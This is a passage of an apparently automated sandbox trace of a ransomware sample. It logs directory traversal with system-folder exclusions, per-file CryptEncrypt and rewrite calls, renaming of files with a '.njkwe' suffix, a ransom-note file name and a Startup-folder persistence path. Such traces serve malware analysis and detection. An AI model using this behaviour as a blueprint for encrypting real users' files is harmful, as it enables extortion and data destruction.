"c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.805] GetProcessHeap () returned 0xbe0000 [0075.805] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.805] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f8cab3, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f8cab3, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f8cab3, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="")) returned 1 [0075.806] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0075.806] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0075.806] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0075.806] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0075.806] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0075.806] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml") returned 100 [0075.806] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0075.806] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.806] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0075.806] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.806] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0075.806] GetTickCount () returned 0x11534b8 [0075.806] GetTickCount () returned 0x11534b8 [0075.806] GetTickCount () returned 0x11534b8 [0075.806] GetTickCount () returned 0x11534b8 [0075.806] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0075.806] GetProcessHeap () returned 0xbe0000 [0075.806] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0075.806] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.807] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.807] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0075.807] GetProcessHeap () returned 0xbe0000 [0075.807] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0075.807] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.807] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0075.808] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0075.808] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0075.808] CloseHandle (hObject=0x434) returned 1 [0075.808] GetProcessHeap () returned 0xbe0000 [0075.808] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.808] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0075.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0075.809] GetProcessHeap () returned 0xbe0000 [0075.809] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0075.809] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0075.809] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0075.809] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0075.809] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0075.809] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0075.809] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0075.809] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov") returned 85 [0075.809] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0075.809] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0075.809] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.809] GetProcessHeap () returned 0xbe0000 [0075.809] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0075.809] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*") returned 87 [0075.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0075.810] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.810] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.810] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.810] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.810] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.810] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\.") returned 87 [0075.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.810] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.810] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.810] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.810] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.810] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.810] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.810] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\..") returned 88 [0075.810] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.811] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.811] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0075.811] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0075.811] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0075.811] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0075.811] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0075.811] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0075.811] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime") returned 93 [0075.811] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0075.811] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0075.811] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0075.811] GetProcessHeap () returned 0xbe0000 [0075.811] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0075.811] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*") returned 95 [0075.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0075.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.812] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.812] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\.") returned 95 [0075.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.812] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1d195e, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1d195e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1d195e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0075.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.812] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\..") returned 96 [0075.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.812] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f405fa, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f405fa, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66853, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0xcec, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0075.812] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0075.812] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0075.812] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0075.812] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0075.812] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0075.812] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0075.812] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0075.812] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.812] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0075.812] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.813] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\0__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.813] GetTickCount () returned 0x11534c8 [0075.813] GetTickCount () returned 0x11534c8 [0075.813] GetTickCount () returned 0x11534c8 [0075.813] GetTickCount () returned 0x11534c8 [0075.813] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.813] GetProcessHeap () returned 0xbe0000 [0075.813] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.813] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0xcec, lpOverlapped=0x0) returned 1 [0075.814] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff314, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.815] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0xcec, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0xcec, lpOverlapped=0x0) returned 1 [0075.815] GetProcessHeap () returned 0xbe0000 [0075.815] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.815] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.815] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.815] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.815] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.815] CloseHandle (hObject=0x43c) returned 1 [0075.815] GetProcessHeap () returned 0xbe0000 [0075.815] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.815] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe") returned 137 [0075.815] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\0__power_policy.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\0__Power_Policy.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\0__power_policy.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0075.816] GetProcessHeap () returned 0xbe0000 [0075.816] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0075.816] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f66853, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f66853, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f66853, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x716, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1__Power_Policy.provxml", cAlternateFileName="")) returned 1 [0075.816] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Windows") returned -1 [0075.816] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0075.816] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0075.816] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Program Files") returned -1 [0075.816] lstrcmpiW (lpString1="1__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0075.816] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Policy.provxml") returned 117 [0075.816] StrStrIW (lpFirst="1__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0075.816] lstrcmpW (lpString1="1__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.816] lstrcmpW (lpString1="1__Power_Policy.provxml", lpString2="taridd") returned -1 [0075.816] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Poli", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0075.816] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\Prov\\RunTime\\1__Power_Policy.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{7a30a9be-737f-47a1-a541-6e7b0761ed19}\\prov\\runtime\\1__power_policy.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0075.817] GetTickCount () returned 0x11534c8 [0075.817] GetTickCount () returned 0x11534c8 [0075.817] GetTickCount () returned 0x11534c8 [0075.817] GetTickCount () returned 0x11534c8 [0075.817] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0075.817] GetProcessHeap () returned 0xbe0000 [0075.817] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4f858 [0075.817] ReadFile (in: hFile=0x43c, lpBuffer=0xc4f858, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesRead=0x380edc4*=0x716, lpOverlapped=0x0) returned 1 [0075.819] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffff8ea, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.819] WriteFile (in: hFile=0x43c, lpBuffer=0xc4f858*, nNumberOfBytesToWrite=0x716, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4f858*, lpNumberOfBytesWritten=0x380edc4*=0x716, lpOverlapped=0x0) returned 1 [0075.819] GetProcessHeap () returned 0xbe0000 [0075.819] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4f858 | out: hHeap=0xbe0000) returned 1 [0075.819] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.819] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0075.819] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0075.819] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0075.819] CloseHandle (hObject=0x43c) returned 1 [0075.819] GetProcessHeap () returned 0xbe0000 [0075.819] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0075.819] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 